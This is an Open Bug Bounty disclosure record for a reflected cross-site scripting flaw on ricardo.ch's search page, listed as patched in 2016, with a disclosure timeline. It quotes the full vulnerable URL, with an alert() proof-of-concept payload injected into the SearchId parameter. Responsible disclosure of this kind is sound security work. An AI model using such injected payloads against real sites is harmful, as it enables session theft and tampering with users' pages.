ricardo.ch XSS vulnerability

2015-11-18T08:24:00
ID OBB:107654
Type openbugbounty
Reporter dim0k
Modified 2016-10-11T21:28:00

Description

Vulnerable URL:
https://www.ricardo.ch/search/index/?SearchId=cvXfxKB6GhJWJ4UW'-alert(/XSSPOSED/)-'&SearchSentence;=5675&OriginalSentence;=56757&UseDescription;=True&IsDidYouMean;=True&IsNavbarSearch;=True
Details:

Description| Value
---|---
Patched:| Yes, at 11.10.2016
Latest check for patch:| 11.10.2016 07:08 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4347
Google Pagerank| 6
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 18 November, 2015 08:24 GMT
Vulnerability existence verified and confirmed| 18 November, 2015 08:27 GMT
Vulnerability patched by the website owner| 11 October, 2016 21:28 GMT